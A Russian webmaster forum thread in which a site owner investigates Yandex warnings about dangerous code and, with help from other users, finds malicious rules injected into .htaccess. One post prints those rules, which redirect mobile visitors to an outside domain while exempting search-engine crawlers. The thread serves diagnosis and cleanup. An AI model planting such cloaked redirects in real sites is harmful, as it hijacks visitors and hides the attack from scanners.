Форум Практика оптимизации Частные вопросы - ранжирование, индексация, бан

На сайте обнаружен потенциально опасный код

S
На сайте с 01.04.2011
Offline
21
senty
1306

Здравствуйте!

3 недели назад мне пришло сообщение на эл. почту:


На сайте обнаружен потенциально опасный код
........

Сайт: http://www.susumisushi.ru/ (сайт просто висит, там ни чего не делается)

Удивился, зашел, посмотрел исходный код, ни чего не обнаружил примечательного для себя, нажал кнопку "Перепроверить сайт", спустя какое-то время:

Перепроверка сайта www.susumisushi.ru не выявила потенциально опасного кода

Сегодня пришло вновь аналогичное сообщение по этому сайту:


На сайте обнаружен потенциально опасный код
........

Через ~ 2 часа пришло аналогичное сообщение еще для двух сайтов: okna01.ru и armada18.ru

Визуальный анализ исходного кода ни чего не выявил, htaccess чист.

Сайты размещается на хостинге timeweb.ru, сайты на разных серверах.

Сайты работают на разных CMS.

Как быть мне в этой ситуации, где искать? Нужен совет. Спасибо.

september
На сайте с 11.09.2009
Offline
591
september
#1

Ого, аж 19 страниц в индексе, я ожидал увидеть только мооду :D

Попробуйте еще раз перепроверить и при отрицательном результате поискать на серче тех, кто поможет вам найти вирусы/проблемы.

$ карта для вывода вебмани в любой точке мира (https://www.epayments.com/registration?p=dc2462e885)
S
На сайте с 01.04.2011
Offline
21
senty
#2
september:
Ого, аж 19 страниц в индексе, я ожидал увидеть только мооду :D

Попробуйте еще раз перепроверить и при отрицательном результате поискать на серче тех, кто поможет вам найти вирусы/проблемы.

Уже отправил на перепроверку, но неприятно, пытаешься зайти на сайт, а тебе сообщение что он может быть потенциально опасен, к тому же ссылки на то чтобы перейти на сайт несмотря на предупреждение почти не заметны, посетителей боюсь терять будет сайт из-за этого.

Мало того что 19 страниц, у него тиц 10 и держится уже полгода наверное, хочу потом какой-нить информационый сайт по суши для Иркутска собрать, изначально планировалось сделать сайт для автосуши и продать его (в иркутске есть автосуши с таким названием), но они интереса не проявили ... %)

Индекс стоит несмотря на Вирусы на сайте и Перестали показываться объявления
R
На сайте с 24.01.2008
Offline
180
Алексей
#3

ТС пройдитесь по корневым файлам вашего сайта, шаблон посмотрите, но если ранее с такой проблемой не сталкивались возможно своими силами не получится решить проблему, очень часто и опытные вебмастера не решают данную проблему.

Очень часто яндекс то видит, то не видит вирус, скорей всего просто он показывается 1 раз в сутки или еще какой-нибудь механизм.

Если сами не справитесь стучите проверим сайт на вирусы + дадим рекомендации!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
Вирус cms DLE Вредоносный код на сайте вирус на WordPress
W
На сайте с 05.04.2006
Offline
174
Wss
#4
senty:

Сайты размещается на хостинге timeweb.ru, сайты на разных серверах.

похоже вам сюда /ru/forum/798529

бдю
S3
На сайте с 18.04.2011
Offline
109
sok3535
#5

могло это 

<p style="display: none;" class="develop"><a href="......webzing......ru/index.php?id=5" target="_blank">Создание сайтов</a> - WebZing.</p>
так сказаться
S
На сайте с 01.04.2011
Offline
21
senty
#6
sok3535:
могло это 
<p style="display: none;" class="develop"><a href="......webzing......ru/index.php?id=5" target="_blank">Создание сайтов</a> - WebZing.</p>
так сказаться

Может, но опять, это было бы справедливо для 1-го сайта, а их сразу 3.

Написал обращение в timeweb после прочтения темы

Wss:
похоже вам сюда /ru/forum/798529
S3
На сайте с 18.04.2011
Offline
109
sok3535
#7

редирект http://www.bertal.ru/index.php?a833002/www.susumisushi.ru/#h

S
На сайте с 01.04.2011
Offline
21
senty
#8
sok3535:
редирект http://www.bertal.ru/index.php?a833002/www.susumisushi.ru/#h

Спасибо! Ваша ссылка очень помогла, плюс я был изначально невнимателен, друг проверил htaccess, в нем оказался вот такой код:


#########SORRY###########
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://browser-28.com/s/6256 [L,R=302]
# For Friendly URLs
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]

# Reduce server overhead by enabling output compression if supported.
#php_flag zlib.output_compression On
#php_value zlib.output_compression_level 5

Очень понравилась первая строчка)

Но 2 других сайта не содержат этого.

S
На сайте с 01.04.2011
Offline
21
senty
#9

Сегодня от Яндекса пришли сообщения:


Перепроверка сайта www.okna01.ru не выявила потенциально опасного кода
Перепроверка сайта www.armada18.ru не выявила потенциально опасного кода
Mahnoshka
На сайте с 12.08.2007
Offline
128
Mahnoshka
#10

латаем дыры в CMS + сменить пароли на хостинг

двигаю этим (http://www.miralinks.ru/users/registration/from:3481) Авторег аккаунты (http://saleaccs.net)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий